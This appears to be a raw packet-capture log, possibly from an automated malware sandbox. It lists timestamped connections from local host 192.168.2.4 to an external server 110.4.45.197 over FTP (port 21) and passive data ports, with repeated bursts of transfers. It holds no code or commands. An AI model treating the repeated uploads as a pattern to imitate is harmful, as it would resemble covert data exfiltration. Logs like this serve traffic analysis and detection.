                                                                                                          Nov 4, 2024 21:27:31.048000097 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.048018932 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.048228979 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.048396111 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.048405886 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.048444033 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.048579931 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.048696041 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.049465895 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.049557924 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.049607992 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.049618006 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.049627066 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.049638987 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.049649000 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.050117970 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.056576014 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.161933899 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.807467937 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.899138927 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:42.158437014 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:42.163845062 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:42.503351927 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:42.503834009 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:42.508804083 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:42.508961916 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:42.509063005 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:42.514035940 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.494218111 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.497608900 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.548508883 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548531055 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548552036 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548563957 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548573971 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548585892 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548595905 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548608065 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548619986 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548626900 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.548639059 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.548674107 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.548711061 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.575603008 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.575613976 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.575623989 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.575634956 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.575673103 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.575691938 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.577186108 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.577197075 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.577207088 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.577218056 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.577228069 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.577229977 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.577289104 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.606122017 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.606134892 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.606146097 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.606154919 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.606180906 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.606204033 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.620482922 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.620495081 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.620503902 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.620512962 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.620523930 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.620560884 CET5127150036110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.620606899 CET5003651271192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:43.695734978 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:43.695787907 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:44.300317049 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:44.469809055 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:46.045569897 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:46.050576925 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:46.385701895 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:46.386384964 CET5003762468192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:46.391477108 CET6246850037110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:46.391542912 CET5003762468192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:46.391652107 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:46.396455050 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:47.339618921 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:47.343463898 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:47.349348068 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:47.349533081 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:47.921853065 CET6246850037110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:47.921979904 CET5003762468192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:59.079837084 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:59.084712029 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:59.428966045 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:59.430979013 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:59.435966969 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:59.438647985 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:59.438764095 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:59.444082975 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.356689930 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.356966972 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362113953 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362147093 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362157106 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362163067 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362194061 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362221003 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362251997 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362323999 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362334013 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362366915 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362385035 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362416983 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362458944 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362538099 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362554073 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362579107 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362593889 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.362610102 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.362646103 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367393970 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367436886 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367551088 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367561102 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367568970 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367589951 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367613077 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367750883 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367760897 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.367788076 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367820978 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.367981911 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368024111 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.368037939 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368088007 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.368314981 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368359089 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.368406057 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368416071 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.368455887 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.368490934 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.372509956 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373363018 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373449087 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373459101 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373500109 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373509884 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373562098 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373610020 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373620033 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.373630047 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.379014969 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.381572008 CET6051150038110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:00.381622076 CET5003860511192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:00.492906094 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:01.145380974 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:01.290642023 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.200150967 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.205251932 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:05.549232960 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:05.551028013 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.555936098 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:05.558631897 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.558703899 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:05.564135075 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.484287024 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.484582901 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.489415884 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489437103 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489445925 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489490986 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.489527941 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489537001 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489541054 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489550114 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489566088 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.489603996 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.489609957 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489624023 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489645958 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.489720106 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494473934 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494529009 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494560957 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494587898 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494597912 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494606972 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494628906 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494677067 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494714022 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.494724989 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494887114 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494956017 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494973898 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.494988918 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.495007992 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.495058060 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.495496035 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499474049 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499522924 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499543905 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499556065 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499680996 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499825954 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499887943 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.499897003 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500056028 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500138998 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500147104 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500154972 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500173092 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500181913 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500190973 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500255108 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500263929 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500272989 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.500281096 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.501059055 CET5961650039110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:06.501281977 CET5003959616192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:06.682585001 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:07.280531883 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:07.492934942 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:17.310868025 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:17.316135883 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:17.316214085 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:18.235924006 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.236058950 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:18.241478920 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.579554081 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.579694033 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:18.584517956 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.950798035 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:18.950944901 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:18.955909014 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.295345068 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.295480967 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:19.300924063 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.654599905 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.654776096 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:19.659710884 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.997891903 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:19.998037100 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:20.003582001 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:20.341048002 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:20.341597080 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:20.347496986 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:20.347573042 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:20.347642899 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:20.352833986 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.256980896 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.264699936 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.269654989 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269701004 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269718885 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269730091 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269738913 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269877911 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.269889116 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269900084 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269908905 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269926071 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.269929886 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.269948006 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.270123959 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.270158052 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.270220041 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.275044918 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275055885 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275094032 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275103092 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275192976 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275245905 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.275300026 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275310040 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275516033 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275527000 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275535107 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.275578976 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.275639057 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.275664091 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.280143023 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.280452013 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.280668974 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.280786037 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.281264067 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.281799078 CET6502850041110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.284595966 CET5004165028192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:21.468003035 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:21.468945980 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:22.018806934 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:22.180685043 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:22.275010109 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:22.280653000 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:22.654452085 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:22.654942989 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:22.660114050 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:22.660178900 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:22.660265923 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:22.665262938 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.579749107 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.580677986 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.585788012 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585808039 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585819006 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585866928 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.585880041 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585890055 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585891008 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.585907936 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585920095 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585942984 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.585942984 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585954905 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585957050 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.585973978 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.585982084 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.586219072 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.586219072 CET5004259156192.168.2.4110.4.45.197
